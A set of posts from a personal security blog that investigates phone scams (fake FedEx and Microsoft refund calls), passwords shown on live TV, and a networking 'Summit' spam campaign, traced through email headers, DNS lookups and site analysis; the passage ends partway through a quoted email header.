Showing posts with label Security Stuff -- Badness Abound. Show all posts
Showing posts with label Security Stuff -- Badness Abound. Show all posts

Monday, July 31, 2017

No, I Do Not Have a FedEx Package Pending Delivery

Had my new office line for only 245 days, and usually don't have a reason to give it out since I just use the cel for convenience. . .

But still got tagged by the FedEx Delivery Scam today on the office line this morning claiming that [I] "had a package ready to be delivered to [Our Seattle Corporate Address] and needed to confirm delivery information".

Specific flags:
1) FedEx doesn't do this
2) Foreign accent with broken english on unsolicited call
3) Caller ID popped up a Sri Lanka phone number (+94 90161370) (I assume is bogus)
4) Call logs show it was forwarded out of a San Jose, California number (1-408-907-1818) (Marked as unsafe/spam call in online searching)
5) When I asked for the tracking number, they gave me a 10 digit number (FedEx Track numbers are 12 or 14 digits)
6) When I asked for the sender info, they said it was a bank (could not understand the name due to accent)
7) Said details would be in the email they would send me
8) When I asked for a call back number, they said I could go by my local FedEx Office

Good times

Wednesday, March 8, 2017

A Teachable Moment about Usernames, Passwords, Whiteboards, and Live Television

(Update 6:25P)
The later live shot went out of their way to not show the section of the whiteboard with the usernames and passwords. What was shown had the wifi password erased clean without any after image.

Good on them.

Bad security to have the info posted in the first place.

But the Organization reacted quickly to minimize the security incident. That's the right next move to be sure.

Hopefully, they are also (at a minimum):
1) Immediately changing all the affected passwords to new complex equivalents (while masked in my screenshot, the original passwords did not appear to follow such standards)

2) Establish/maintain a formal policy prohibiting the sharing of usernames and passwords in open mediums (post-it notes, whiteboards, etc)

3) Require unique usernames and passwords be assigned and used by all authorized individuals (as activity on shared accounts cannot be tracked/monitored without repudiation to a specific offender)

4) Establish/maintain a password expiration mechanism that forces all users to reset their passwords every 60-90 days (at a maximum)

5) Codify mandatory username and password lifecycle management requirements and limitations within a formal Access Control Policy (if it hasn't already been)

6) Include username and password requirements and limitations within Awareness Training and Acceptable Use Policy (AUP) provided to all organization stakeholders

Bonus points if they are also (at a minimum):
7) Creating new accounts replacing those which were wrongly shown to the live tv audience

8) Disabling and removing all assigned privileges from the existing now replaced accounts (including any remote access abilities)

9) (Regardless of points 6 and 7 are followed) Monitoring all accounts, both the newly established and the replaced disabled, for any misuse attempts

10) Establish/maintain a policy which reviews an internal/restricted area for confidential information -- removing/masking any identified -- prior to being accessible by the public (whether onsite, via a recorded video, or during a live TV shot)



(Original Post 4:38P)
Clearly no nefarious act here with the company or the news station. . . but. . .

If you're going to let a local news crew into your office to do a live shot praising your service - please remember to remove your admin and wifi passwords from the whiteboard in the background.

Or just don't put them there to begin with. That's a far better plan.

And also please only use complex passwords and accounts tied to an individual user so the activity can be fully tracked.

So much badness here. Not good times.



Thursday, September 29, 2016

[UPDATED] No, Microsoft Will Not Call You Direct to Offer a Refund for Anything

Update -- September 30th
The scammer called back a few moments ago from a "Private Number"

Picked up the phone without saying anything and heard him speaking (what sounded like, but I'm not sure) Hindi or some other Indian region language to somebody in the background.

He started out without saying hello, but just jumping again claiming that he was the "Microsoft Helpdesk" and that he "sent me an email yesterday about the refund".

I asked him what email he sent it to as I have received nothing. He said marcinko@aol.com -- which might be a legitimate email, but not one of mine. Weirdly, he seemed perplexed about my response, pausing and fumbling through a couple of words I couldn't understand.

I then noted that I tried to call him back at the number he gave me, but the people who answered didn't know anything about what he was talking about. And then he hung up on me without any other comment.

Still expect better customer service from my scammers. . .


Original Post -- September 29th
Got a call from somebody claiming they are Microsoft helpdesk -- typical scam

New derivative though, this guy wasn't claiming the usual "your machine is infected with a virus" or otherwise was "reporting errors and logs" and what not. He was instead claiming that I was due a refund for Microsoft Support for which I had previously paid. And that all I needed to do was 'register' it on some internet website he wanted me to login to.

At that point, I said I wasn't anywhere near my PC and asked if there was a number I could call him back at in 20 minutes. He gave one, then said he would call me back in twenty, and then hung up without saying goodbye.

I expect better customer service from my scammers.

Whatever the case, there's a new/old game in town.

Call Info:
  • Caller ID -- Unavailable Name / Out of Area Number
  • Guy on the Other End -- Heavy Middle Eastern accent, using a common western name
  • Background Noise -- Didn't sound like a crowded area, coffee shop, or room with other scammers
  • Number Given for Callback -- 800-492-3939

That call back number does work, but when calling it direct it answers with an automated voice:
"You have reached a national telemarketing company. They number you dialed is (changes to choppy phonetic voice) 1-8-0-0-4-9-2-3-9-3-9

(Changes back to normal automated voice) Again the number you have reached is (changes back to choppy phonetic voice) 1-8-0-0-4-9-2-3-9-3-9

(Changes back to normal automated voice) If you believe you have dialed the correct number, please press 1 and I will transfer to an agent

Ok, I'll transfer you now. Please stand on the line to continue. To ensure proper handling, call may be recorded" (and so on)

That inbound message in itself seems very shady to me. Doesn't identify itself in any regard. Message seems designed to be to be overly vague/cheap/fly-by-night. Just enough to answer the call. But also flexible enough to be changed at a moment's notice when needed to avoid a negative reputation or legal inquiry.

I donno.

Spoke to somebody on the other end, and after they asked for my zip code -- they said they were an inbound call center run by a company named Alorica.

When I asked why they needed my zip code, they gave me a vague doubletalk response. Explained that I got this number from somebody who called me, and the person on the other end said that they didn't have any information about that. She hung up on me after I asked her to spell her company's name to make sure I got it.

Called back, got somebody else. Told them that somebody had called me and tried to claim they were working for Microsoft -- and also claiming that they were from this number.

While she was much more polite, she also said that they didn't make outbound phone calls. And within the product/company list she had in her system, Microsoft was not listed. I got the sense she had also not heard of the "Microsoft" scam. And she wasn't able to give any additional info.


So recapping:
  • Got a scam call from somebody claiming to work for Microsoft
    (Microsoft would never EVER do this)
  • Scammer claimed I was due a refund for support services I had previously paid
    (And support services I never paid for)
  • All I had to do was register my PC
    (By connecting with it to their website)
  • Scammer gave me a callback number of 800-492-3939 for what appears to be a different company
    (Wasn't expecting that)
  • Different company in itself seemed very very VERY shady in their own right
    (WTF?!?)
  • And by the time I write this, it's been 25 minutes -- so I gather the Scammer isn't calling back
    (Chicken)


Good times

Sunday, January 5, 2014

No, I Do Not Want to Become a Part of Your Summit (Update4)

Update4 (August 9th, 2014 @ 9:30a):
Still getting a handful of these scam emails each month. Not nearly as many I used to, though I gather many many others out there are (based on the traffic to this page)

What I am receiving directly still look like retreads of the previous messages. Names, dates, and company references have been changed. The general message still remains (all but) the same.

Did see one new derivative with a different domain name, though. This one claiming that I've been nominated to be a cool leader. That's nice. Certainly been called worse by people who know me better. . .

----- Original Message -----
To: Denny [MASKED]
From: Matt T. Keener
Subject: Denny, question

Hi Denny, one of our members had nominated you for membership and I just wanted to follow-up on that request if you could advise.

We are a high level group of top COOs and Operations executives who meet monthly. You will find the other executives, topics, dates, and yearly dues info here.

www [DOT] cooleaders [DOT] org

Place my name in the last field of our signup page before our next monthly meeting for 10 pcnt from dues and I will also walk it through our screening committe.


Yours Truly,
Matt T. Keener
Operations Summit
The Organization of COOs and Operations Executives


This message is confidential and intended only for the original recipient. If you have received this message in error, please delete it or mail us back with re move in the sub ject. If any follow-up is needed I show your contact information as: Denny [MASKED], dweldon@[MASKED] Anderson Oil and Tire Co 254-840-2781 and you may also reach us at 1200 Abernathy Rd, Atlanta GA 30328 or through the contact page of our site. Thank you.


Update3 (January 5th, 2014 @ 8:30p):
Still getting a handful of these scam emails each week.

Most are just retreads of the previous messages. Names, dates, and company references have been changed. The general message still remains (all but) the same.

Others are similar, but are using tweaked domain names -- such as:
From:
Chris H Sanders (chrissanderpm1133 [AT] gmail [DOT] com) talking about "projectmanagementleaders [DOT] org" meetings on January 21st and February 18th, 2014

J.R. Williams (jason [AT] the-ciosummit [DOT] net) talking about another derivitive program named "the-ciosummit [DOT] net"

Chris H Sanders (chrissanderscio1144[AT]gmail [DOT] com) talking about "ciosummits [DOT] org" meetings on January 10th, February 14th, and March 15th, 2014

Still others (somewhat oddly) are forwarded versions of the original in an attempt to 'follow-up' on the first salespitch.
Hi Gabriel, I was just checking back to see if you had reached a decision per my original email below. We have a couple of openings and I thought you would enjoy the group. Here's a partial list of some of our members and speakers:

AT&T
Boston Scientific
Cisco
Logitech
Nordstrom

And also a number of smaller companies where we thought the head of Engineering had a lot of creativity and ideas to share.

Can you look at the www[DOT]theengineeringsummit[DOT]org meeting schedule and get back to me or relay if you think another is more appropriate? The others would really enjoy your participation.

Sincerely yours,
P. Hansen
Engineering-Summits
The Organization of Engineering Executives
www[DOT]theengineeringsummit[DOT]org


----- Original Message -----
To: Gabriel [MASKED]
From: P. Hansen
Subject: Gabriel, question

Hi Gabriel, on behalf of our Board I wanted to ask if you would like to become a part of the Engineering-Summits because of your experience and key role.

We are a high level group comprised of top Engineering executives and visionaries. We meet monthly by phone to exchange what is working, what is not, strategies and ideas. Our main goal is to help each other achieve. For a list of those you would be interacting with and upcoming meeting dates see:
www[DOT]theengineeringsummit[DOT]org

I am certain you will find the experience really useful in your efforts. Let me know of your decision (or relay if you think another is more appropriate as we wish involvement from your company). Thanks Gabriel.


Sincerely yours,
P. Hansen
Engineering-Summits
The Organization of Engineering Executives


Update2 (July 13th, 2013 @ 12:41p):
Received another version of the scam this week.

This one quotes certain companies who they claim will be represented. And though its pointing the reader towards the Project Management Summit (projectmanagementsummit [DOT] net), the email headers show it was sent via Association Growth Summit (associationgrowthsummit [DOT] net)

Also -- got pinged by another recipient of the scam who noted his version called themselves the "Human Resources Leadership Group"


Update1 (May 15th, 2013 @ 8:48a):

Received a new derivative of the scam this morning. This time speaking of an Engineering Summit on June 20th


Original Post (May 1st, 2013 @ 5:00p):
I've received a few emails every couple of days since April 10th in the catchall box which caught my eye.

Each ask if I would be interested in some sort of leaders summit. Some for a "Project Management Summit." Some for an "Engineering Summit." Some for an "Engineering Management Leaders Group." And several other derivatives.

So this seems like standard spam when just looking at its face value. Particularly since the text is generally the same, complete with the quirky english and the repeating formatting errors. And a quick Google search for a snip-it of the email pulls up a plethora of scam warnings from the last few years.

Except for this weirdness -- each of these emails are being sent to people I used to work with at EDS, if they had a @christoperj.com email address.

So if question 1 is "what the crap?", questions 2 and 3 follow oh so close behind with "how the hell?" and "why for?"

Not so sure about either, though I agree with the internet consensus that this incident seems probably only just a scam and not necessarily malicious.

I've received eight emails as of this moment. Last one being from 8:39a yesterday morning.
Email #1:
From: Matthew T. Kenner
Subject: Tim, question
Sent to: Tim M. on April 10 for a "COO Summit" @ www [DOT] theoperationssummit [DOT] org
(via 66.109.23.136 / Galaxyvisions Inc in Brooklyn, NY)

Email #2:
From: Matthew Kenner
Subject: Randy, question
Sent to: Randy G. on April 10 for a "Project Management Summit" @ www [DOT] projectmgmtsummit [DOT] com
(via 208.72.154.164 / Biz Summits in Marrietta, GA)

Email #3:
From: P. Hansen
Subject: Sally, question
Sent to: Sally C. on April 11 for "Engineering-Summits" @ www [DOT] theengineeringsummit [DOT] org
(via 207.234.177.42 / Affinity Internet in Ft. Lauderdale, FL)

Email #4:
From: Pat M. Hansen
Subject: Randy, question
Sent to: Randy S. on April 12 for a "Engineering-Summit" @ www [DOT] theengineeringsummit [DOT] org
(via 207.234.177.42 / Affinity Internet in Ft. Lauderdale, FL)

Email #5:
From: Chris Sanders
Subject: Obie, meeting request
Sent to: Obie D. on April 22 for a "Engineering Management Leaders group" @ engineering-summit [DOT] org
(via 209.85.213.198 / Google Gmail SMTP)

Email #6:
From: Patrick M. Hansen
Subject: Priscilla, question
Sent to: Priscilla D. on April 29 for a "Engineering Summit" @ www [DOT] theengineeringsummit [DOT] org
(via 207.234.177.42 / Affinity Internet in Ft. Lauderdale, FL)

Email #7:
From: Matt T. Kenner
Subject: Lynne, question
Sent to: Lynne B. on April 30 for a "Project Mgmt Summits" @ www [DOT] projectmgmtsummit [DOT] com
(via 208.72.154.164 / Biz Summits in Marrietta, GA)

Email #8:
From: Matt T. Kenner
Subject: Linda, question
Sent to: Linda A. on April 30 for a "Project Mgmt Summits" @ www [DOT] projectmgmtsummit [DOT] com
(via 208.72.154.164 / Biz Summits in Marrietta, GA)

Every email received is using a name of a (previous) peer to derive a @christoperj.com address using the same standard: First Initial + Last Name @ christoperj.com.

I worked with each of them somewhere within a five year range when I was doing Managed Firewall Engineering at EDS. And the groups or summits listed do seem to line up with what they would have been responsible at the time.

The general text matches up in each email, with only a few key details (such as the advertised summit/group name) changed from one message to the next. Spacing errors match up. As does the type in the footer address which shows 201 (Two-Zero-One) as 2O1 (Two-Letter O-One), leading me to believe the original template was created with some sort of voice recognition or OCR scanning.

Example Email:
Hi Linda, on behalf of our Board I wanted to ask if you would like to become a part of the Project Mgmt Summits because of your experience and key role.

We are a high level group comprised of top Project Management executives and visionaries. We meet monthly by phone to exchange what is working, what is not, strategies and ideas. Our main goal is to help each other achieve. For a list of those you would be interacting with and upcoming meeting dates see: www [DOT] projectmgmtsummit [DOT] com

I am certain you will find the experience really useful in your efforts. Let me know of your decision (or relay if you think another is more appropriate as we wish involvement from your company). Thanks Linda.


Truly,
Matt T. Keener
Project Mgmt Summits
The Organization of Project Management Executives



This message is confidential and intended only for the original recipient. If you have received this message in error, please delete it or mail us back with re move in the sub ject. If any follow-up is needed I show your contact information as: Linda A[MASKED], la[MASKED]@christoperj.com, Paul Anderson Robert 254-840-2781 and you may also reach us at 2O1 17th Street, 17th Floor, Atlanta Georgia 3O363 or through the contact page of our site.

So all that said -- it's clear these emails want the readers to visit four specific websites:
www [DOT] theoperationssummit [DOT] org @ 50.63.202.4
www [DOT] projectmgmtsummit [DOT] com @ 66.240.166.202
www [DOT] theengineeringsummit [DOT] org @ 50.63.202.29
engineering-summit [DOT] org @ 208.76.222.197

Ran all of them through some standard online link security checkers.
www [DOT] theoperationssummit [DOT] org
Google Safe Browsing: Safe
PhishTank: Safe
Web Of Trust: Low Confidence Reputation
VirusTotal: Safe (0 Malware Detected vs. 38 Scanners, and no downloads detected)
www [DOT] projectmgmtsummit [DOT] com
Google Safe Browsing: Safe
PhishTank: Safe
Web Of Trust: Not Enough Ratings to Score
VirusTotal: Safe (0 Malware Detected vs. 38 Scanners, and no downloads detected)
www [DOT] theengineeringsummit [DOT] org
Google Safe Browsing: Safe
PhishTank: Safe
Web Of Trust: Poor Reputation (Reported Spam Domain)
VirusTotal: Safe (0 Malware Detected vs. 38 Scanners,and no downloads detected)
engineering-summit [DOT] org
Google Safe Browsing: Safe
PhishTank: Safe
Web Of Trust: Not Enough Ratings to Score
VirusTotal: Safe (0 Malware Detected vs. 38 Scanners,and no downloads detected)

I also opened up all four sites on my sandbox machine and dumped all the traffic to a PCAP -- but didn't find any weirdness in my picking through the packet stream.

Did, however, notice each of the domains are using an imbeded frame to mask how they are actually pulling their templates from a parent webserver @ http:// shrtct [DOT] net/[SPECIFIC SHORTCUT FOR DOMAIN]/
(Sanitized) HTML Code Pulling Template for Engineering Summit Version
frameset rows="100%,*" border="0"
frame src="http://shrtct [DOT] net/engineeringsummit/" frameborder="0" /
frame frameborder="0" noresize /
/frameset

In fact, all of the Summit page templates are basically the same. The title and the target audience seems to be the only thing which is different from one site to the next. They even all use the same four rotating stock images on the home page to help "sell" the site.
Home page of the COO Summit website
Home page of the COO Summit website
Home page of the Project Management Summit page
Home page of the Project Management Summit page
Home page of the Engineering Summit page
Home page of the Engineering Summit page (regardless of which version of the Engineering Summit link is clicked)

The root of the shrtct [DOT] net website identifies itself as "Arja: The Management ThinkTank." A "Members Only" section is offered, but is actually a dead link.
Webpage on the root of the three parent domains being used to host the various templates
Webpage on the root of the three parent domains being used to host the various templates
The secure login page was not found
The secure login page was not found

Did a DNS lookup on the actual destination server.
shrtct [DOT] net
A: 64.71.39.117, 66.113.129.243, 64.26.0.115

NS: a [DOT] dns [DOT] hostway [DOT] net
& b [DOT] dns [DOT] hostway [DOT] net

Reverse IP DNS: also hosting passto [DOT] org &
shrtcut [DOT] net
(all of which pull up the same "Arja: The Management ThinkTank." website

A Google site: search for everything hosted off on all three parent domains brings up a myriad of additional "Summit" sites.
Association Growth Summit @ www [DOT] associationgrowthsummit [DOT] net

BizSummits @ www [DOT] bizsummits [DOT] org

CFO Summit @ www [DOT] cfosummit [DOT] org

CIO Summit @ www [DOT] ciosummit [DOT] org

CMO Summit @ www [DOT] cmosummit [DOT] net

Corp Develop Summit @ www [DOT] corpdevsummit [DOT] org

Corporate Council Summit @ www [DOT] thecorporatecounselsummit [DOT] org

Customer Service Summit @ www [DOT] customerservicesummit [DOT] org

Engineering Summit @ www [DOT] theengineeringsummit [DOT] net

Hospital Growth Summit @ www [DOT] hospitalgrowthsummit [DOT] org

HR Summit @ www [DOT] hrsummit [DOT] org

Procurement Summit @ www [DOT] procurementsummit [DOT] org

Product Dev Summit @ www [DOT] productdevsummit [DOT] org

Project Management Summit @ www [DOT] projectmanagementsummit [DOT] org

Public Relations Summit @ www [DOT] thepublicrelationssummit [DOT] org

Quality Management Summit @ www [DOT] qualitymanagementsummit [DOT] org

Rick Management Summit @ www [DOT] riskmanagementsummit [DOT] org

Safety Management Summit @ www [DOT] safetymanagementsummit [DOT] org

Sales Summit @ www [DOT] salessummit [DOT] org

Supply Chain Summit @ www [DOT] supplychainsummit [DOT] org

Training Summit @ www [DOT] trainingsummit [DOT] org

As with the ones I received emails for -- all seemed to use the same general template, with only few words were tweaked from one version to the next. Sampled a few. Nothing malicious popped up here either.

The endgame on each site seems to be to sell a membership to the networking group at a cost of $1250 for the first year, or $2250 for two years (at a 10% discount). Holy crap on a cracker!
(Cough) $1250 for a membership to stuff I can get for basiclly free elsewhere?
(Cough) $1250 for a membership to stuff I can get for basiclly free elsewhere?
Benefits included with the ginormous $1250 cost
Benefits included with the ginormous $1250 cost

Can't speak to the actual value of what benefits they claim are included. But what the benefits they advertise seem to easily equate to what I've seen for free through a wide variety of other internet based business networking resources. I'm guessing the mammoth $1250 cost is simply intended to catch those who are not remotely internet savvy or are just looking to spend their company's money without the same skepticism they would have if it was coming out of their own wallet.

These sites might be phishing for the valid credit card information. But it seems like if they were, the cost would be much much MUCH lower to make it far more enticing.

That said, I do think it's very likely that it's taking the phished contact information for whoever signs up and applying it to the affiliated sales leads database(s).

Particularly since the parent webservers also seem to be hosting quite a few other 'sales' related websites. Many of them seem to have specific pages promoting the use email marketing (ie. SPAM). And just as with the Summit pages, many of them also share the same template.
Exactleads @ exactleads [DOT] com

Finance LeadFunnel @ financeleadfunnel [DOT] com

GoPresent @ www [DOT] gopresent [DOT] com

HR LeadFunnel @ www [DOT] leadfunnel [DOT] com

LeadFunnel @ www [DOT] leadfunnel [DOT] com

Meeting Setters @ meetingsetters [DOT] com

Sales LeadFunnel @ salesleadfunnel [DOT] com

TCollaborate @ www [DOT] tcollaborate [DOT] com

TeamEX Strategy Execution System @ www [DOT] teamex [DOT] com

TInnovate @ www [DOT] tinnovate [DOT] com

Sampled a few of these too. Saw nothing malicious here either.

So that's that.

The question remains, however -- how the crap did this spam make the connection between my old peers and my website? Not sure. But I do have a theory.

I have connected to each of them via Linkedin. Must be more than that though, as these are only a small subset of my Linkedin connections. And these are ones I've directly worked with (unlike most of the full list out on Linkedin).

Looking closer -- each of the eight have posted professional recommendations for me out on Linkedin. And each of their good words are reflected out @ christoperj|[.com]: Professional Recommendations, complete with their name and what their job role was at the time.
All LinkedIn professional recommendations are echoed here
All LinkedIn professional recommendations are echoed here
One of the specific names for which I received an email
One of the specific names for which I received an email

Bingo.

I'm now all but certain a web spider came along and crawled my website doing social reconnaissance for employed users and their positions. Having found some that seemed to match it's predefined criteria, it blindly harvested the names and added them to the applicable marketing list. Oops.

Probably didn't even scan a ginormus section of the internet to find the site. I've been using my securityguy23@(harmonic:security) email address for years on all InfoSec and resume' related conversations/posts. And right now, (harmonic:security) cleanly redirects over to christoperj|[.com]. The spider script probably just saw the redirect and assumed the final destination was just an updated domain. Certainly not a stretch given how often companies are acquired and/or otherwise change names these days.

What I am still not sure about is how they came up with the email address format. It's not the format I use for either christoperj|[.com] or (harmonic:security) email domain addresses. And this seems to be the one only format attempted as I haven't seen any other emails hit the box using different variations. Also not sure why I have not received emails addressed to any of the others who's names are out there. Perhaps both are just a matter of time.

Whatever the case, the mystery solved of why I'm receiving emails for my old EDS peers has been solved.

Is this SPAM? -- Oh yes.

Is this a MALICIOUS attempt to do badness? -- Probably not.

Would I recommend doing business with any of these sites? -- Oh no no no no no no. . .

Good times.


Full Source Example #1:
Delivered-To: christoperj
Received: by [MASKED] with SMTP id jt9csp55099ldc;
Tue, 30 Apr 2013 06:55:40 -0700 (PDT)
X-Received: by 10.112.72.131 with SMTP id d3mr13193412lbv.18.1367330139498;
Tue, 30 Apr 2013 06:55:39 -0700 (PDT)
DomainKey-Status: bad format
Received-SPF: pass (: domain of mkeener@projectmgmtsummit.com designates 208.72.154.164 as permitted sender) client-ip=208.72.154.164;
Received: by [MASKED] with POP3 id p11mf383817lbi.6;
Tue, 30 Apr 2013 06:55:37 -0700 (PDT)
X-Gmail-Fetch-Info: [MASKED] 8 [MASKED] 995 [MASKED]
Return-Path:
Delivered-To: <[MASKED]>
Received: from mx1.[MASKED] ([[MASKED]])
by mss-us12.[MASKED] (Dovecot) with LMTP id VCvUHwHJf1EVBQAAkZ4h7A
for <[MASKED]>; Tue, 30 Apr 2013 13:39:32 +0000
Received: from mail.projectmgmtsummit.com (mail.projectmgmtsummit.com [208.72.154.164])
by mx1.[MASKED] (Postfix) with ESMTP id 99A184701FA
for ; Tue, 30 Apr 2013 13:39:32 +0000 (GMT)
Received: from 47503802.projectmgmtsummit.com
by mail.check-details.net (Exact Sender 3.8) with ASMTP id PRR18332
for ; Tue, 30 Apr 2013 09:39:32 -0400
Message-ID: <20130430093919.3e4c8b5b5b@4f4c>
From: "Matt T. Keener"
To: "Linda A[MASKED]"
Subject: Linda, question
Date: Tue, 30 Apr 2013 09:39:19 -0400
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hi Linda, on behalf of our Board I wanted to ask if you would like to =
become a part of the Project Mgmt Summits because of your experience and =
key role=2E

We are a high level group comprised of top Project Management executives =
and visionaries. We meet monthly by phone to exchange what is working, =
what is not, strategies and ideas. Our main goal is to help each other =
achieve. For a list of those you would be interacting with and upcoming =
meeting dates see: www [DOT] projectmgmtsummit [DOT] com

I am certain you will find the experience really useful in your efforts. =
Let me know of your decision (or relay if you think another is more =
appropriate as we wish involvement from your company). Thanks Linda=2E


Truly,
Matt T. Keener
Project Mgmt Summits
The Organization of Project Management Executives



This message is confidential and intended only for the original recipient. =
If you have received this message in error, please delete it or mail us =
back with re move in the sub ject. If any follow-up is needed I show your =
contact information as: Linda A[MASKED], la[MASKED]@christoperj.com, Paul =
A[MASKED] Robert 254-840-2781 and you may also reach us at 2O1 17th =
Street, 17th Floor, Atlanta Georgia 3O363 or through the contact page of =
our site.
Full Source Example #2:
Delivered-To: christoperj
Received: by [MASKED] with SMTP id jt9csp17044ldc;
Mon, 29 Apr 2013 07:18:53 -0700 (PDT)
X-Received: by [MASKED] with SMTP id vu3mr20512771lbb.109.1367245132353;
Mon, 29 Apr 2013 07:18:52 -0700 (PDT)
DomainKey-Status: bad format
Received-SPF: pass (: domain of patrick@theengineeringsummit [DOT] org designates 207.234.177.42 as permitted sender) client-ip=207.234.177.42;
Received: by [MASKED] with POP3 id o11mf2690184lbi.14;
Mon, 29 Apr 2013 07:18:51 -0700 (PDT)
X-Gmail-Fetch-Info: [MASKED] 8 [MASKED] 995 [MASKED]
Return-Path:
Delivered-To: <[MASKED]>
Received: from mx1.[MASKED] ([[MASKED]])
by mss-us12.[MASKED] (Dovecot) with LMTP id C2ohBlV0flEnCwAAkZ4h7A
for <[MASKED]>; Mon, 29 Apr 2013 13:24:07 +0000
Received: from mail.theengineeringsummit.org (unknown [207.234.177.42])
by mx1.[MASKED] (Postfix) with ESMTP id 409413F0031
for ; Mon, 29 Apr 2013 13:24:05 +0000 (GMT)
Received: from 101882955 [DOT] theengineeringsummit [DOT] org
by thecfosummit [DOT] org (Time Mail 5.5) with ASMTP id ORA01155
for ; Mon, 29 Apr 2013 09:23:55 -0400
Message-ID: <20130429092349.9d2e4e8d1d@2f5e>
From: "Patrick M. Hansen"
To: "Priscilla D[MASKED]"
Subject: Priscilla, question
Date: Mon, 29 Apr 2013 09:23:49 -0400
X-Priority: 3
X-Mailer: NoteForwarder
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hi Priscilla, on behalf of our Board I wanted to ask if you would like to =
become a part of the Engineering Summit because of your experience and =
key role=2E

We are a high level group comprised of top Engineering executives and =
visionaries. We meet monthly by phone to exchange what is working, what is =
not, strategies and ideas. Our main goal is to help each other achieve. =
For a list of those you would be interacting with and upcoming meeting =
dates see:=20
www [DOT] theengineeringsummit [DOT] org

I am certain you will find the experience really useful in your efforts. =
Let me know of your decision (or relay if you think another is more =
appropriate as we wish involvement from your company). Thanks Priscilla=2E


Truly,
Patrick M. Hansen
Engineering Summit
The Organization of Engineering Executives



This message is confidential and intended only for the original recipient. =
If you have received this message in error, please delete it or mail us =
back with re move in the sub ject. If any follow-up is needed I show your =
contact information as: Priscilla D[MASKED], pd[MASKED]@christoperj.com, Paul =
A[MASKED] Robert 254-840-2781 and you may also reach us at 1200 Abernathy =
Road #1700, Atlanta Georgia 30328 or through the contact page of our site.
Full Source Example #3:
Delivered-To: christoperj
Received: by [MASKED] with SMTP id h2csp110878ldy;
Wed, 10 Apr 2013 07:28:49 -0700 (PDT)
X-Received: by [MASKED] with SMTP id od6mr1310224lbb.122.1365604125298;
Wed, 10 Apr 2013 07:28:45 -0700 (PDT)
DomainKey-Status: bad format
Received-SPF: pass (: domain of matthew@theoperationssummit.org designates 66.109.23.136 as permitted sender) client-ip=66.109.23.136;
Received: by [MASKED] with POP3 id 10mf470264lbf.11;
Wed, 10 Apr 2013 07:28:44 -0700 (PDT)
X-Gmail-Fetch-Info: [MASKED] 8 [MASKED] 995 [MASKED]
Return-Path:
Delivered-To: <[MASKED]>
Received: from mx1.[MASKED] ([10.98.98.247])
by mss-us12.[MASKED] (Dovecot) with LMTP id T/TPIdFzZVGdIAAAkZ4h7A
for <[MASKED]>; Wed, 10 Apr 2013 14:22:15 +0000
Received: from theoperationssummit.org (unknown [66.109.23.136])
by mx1.[MASKED] (Postfix) with ESMTP id 469DC5406C3
for ; Wed, 10 Apr 2013 14:22:15 +0000 (GMT)
Received: from 95652785.theoperationssummit.org
by mail.teamexcollaboration.net (Time Sender 3.5) with ASMTP id VSG11909
for ; Wed, 10 Apr 2013 10:22:09 -0400
Message-ID: <20130410102159.8b7b5f8d8b@5b3d>
From: "Matthew T. Keener"
To: "Tim M[MASKED]"
Subject: Tim, question
Date: Wed, 10 Apr 2013 10:21:59 -0400
X-Priority: 3
X-Mailer: Email Mailer
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hi Tim, on behalf of our Board I wanted to ask if you would like to become =
a part of the COO Summit because of your experience and key role=2E

We are a high level group comprised of top COOs and Operations executives =
and visionaries. We meet monthly by phone to exchange what is working, =
what is not, strategies and ideas. Our main goal is to help each other =
achieve. For a list of those you would be interacting with and upcoming =
meeting dates see:=20
www [DOT] theoperationssummit [DOT] org

I am certain you will find the experience really useful in your efforts. =
Let me know of your decision (or relay if you think another is more =
appropriate as we wish involvement from your company). Thanks Tim=2E


Sincerely yours,
Matthew T. Keener
COO Summit
The Organization of COOs and Operations Executives



This message is confidential and intended only for the original recipient. =
If you have received this message in error, please delete it or mail us =
back with re move in the sub ject. If any follow-up is needed I show your =
contact information as: Tim M[MASKED], tm[MASKED]@christoperj.com, Paul =
A[MASKED] Robert 254-840-2781 and you may also reach us at 12OO Abernathy =
Road #1700, Atlanta Georgia 30328 or through the contact page of our site.


Update May 15th, 2013 @ 8:48a
Full email from latest derivative. . .

Delivered-To: christoperj@
Received: by 10.23.23.23 with SMTP id k10csp18424ldd;
Wed, 15 May 2013 07:27:39 -0700 (PDT)
X-Received: by 10.152.120.4 with SMTP id ky4mr18170590lab.5.1368628054568;
Wed, 15 May 2013 07:27:34 -0700 (PDT)
DomainKey-Status: good
Received-SPF: pass (: domain of 3D5aTUREJCRw49JAKK2F56JK6TTUU8E2AD.4GE87GFL6FGL49JAKLGH6JB.4GE@maestro.bounces. designates 209.85.223.197 as permitted sender) client-ip=209.85.223.197;
Received: by 10.152.100.212 with POP3 id fa20mf387742lab.27;
Wed, 15 May 2013 07:27:33 -0700 (PDT)
X-Gmail-Fetch-Info: [MASKED] 8 pop.[MASKED] 995 [MASKED]
Return-Path: <3D5aTUREJCRw49JAKK2F56JK6TTUU8E2AD.4GE87GFL6FGL49JAKLGH6JB.4GE@maestro.bounces.>
Delivered-To: <[MASKED]>
Received: from mx1.[MASKED] ([10.98.98.247])
by mss-us12.[MASKED] (Dovecot) with LMTP id ApWJF2KVk1ELTAAAkZ4h7A
for <[MASKED]>; Wed, 15 May 2013 14:05:06 +0000
Received: from mail-ie0-f197. (mail-ie0-f197. [209.85.223.197])
by mx1.[MASKED] (Postfix) with ESMTP id 6BE4E5427DE
for ; Wed, 15 May 2013 14:05:04 +0000 (GMT)
Received: by mail-ie0-f197. with SMTP id 16so6662803iea.0
for ; Wed, 15 May 2013 07:05:04 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=; s=20120113;
h=mime-version:x-received:message-id:date:subject:from:to
:content-type;
bh=BKgtY2minLkUh5aGZJb5V6P5iEwxjeOjpWkAVGPDmJU=;
b=JDbCAMFDEVOQ9HqfPWfBJBYDsDDlhD5x1ylWuow8Hs+YWC9GMtV3x/IRHHMI4q2ASv
OnYgxsUaHDm+Ji+o3OwtDrQKnentZjkmhVc4FdfX96jUzIvtI/6IxVzyWH9T9WYUC2/R
FlwtdMHnUkM8/KcJt4MKoouo7D2UL27ZGaKdbKFZGjjLqJ7JYQbBZRBIftSr9Jyt5LaR
